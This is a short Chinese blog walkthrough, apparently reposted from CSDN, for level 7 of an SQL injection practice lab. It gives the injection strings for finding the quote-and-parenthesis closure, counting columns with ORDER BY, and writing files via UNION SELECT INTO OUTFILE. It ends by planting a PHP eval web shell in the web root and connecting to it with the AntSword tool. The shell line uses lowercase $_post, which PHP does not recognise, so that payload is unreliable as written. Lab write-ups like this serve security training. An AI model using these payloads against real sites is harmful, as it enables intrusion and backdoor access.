SQL靶场第七关攻略

2025/2/25 21:51:30 来源：https://blog.csdn.net/mirliasheong/article/details/144274645 浏览: 次关键词：SQL靶场第七关攻略

一.判断闭合点

闭合点为?id=1'))--+

输入?id=1')) order by 3--+页面正常

输入?id=1')) order by 4--+页面异常，说明有3列

这里显示让我们用outfile来打这关，那我们先了解一下outfile：

用法：select 列名 from table [where语句] into outfile '目标文件'

输入?id=-1')) union select 1,2,3 into outfile "D:/phpstudy/phpstudy_pro/WWW/1.txt"--+测试一下是否能把文件写进去

在这里发现写进来以后，就可以写我们的木马文件

输入?id=-1')) union select 1,2,'<?php eval($_post['cmd'])?>' into outfile "D:/phpstudy/phpstudy_pro/WWW/1.php"--+

这样就把我们的木马文件写进来了，我们打开蚁剑连接

连上蚁剑就获得了他的数据库的管理权限了，以上就是第七关的通关攻略

本网仅为发布的内容提供存储空间，不对发表、转载的内容提供任何形式的保证。凡本网注明“来源：XXX网络”的作品，均转载自其它媒体，著作权归作者所有，商业转载请联系作者获得授权，非商业转载请注明出处。

我们尊重并感谢每一位作者，均已注明文章来源和作者。如因作品内容、版权或其它问题，请及时与我们联系，联系邮箱：809451989@qq.com，投稿邮箱：809451989@qq.com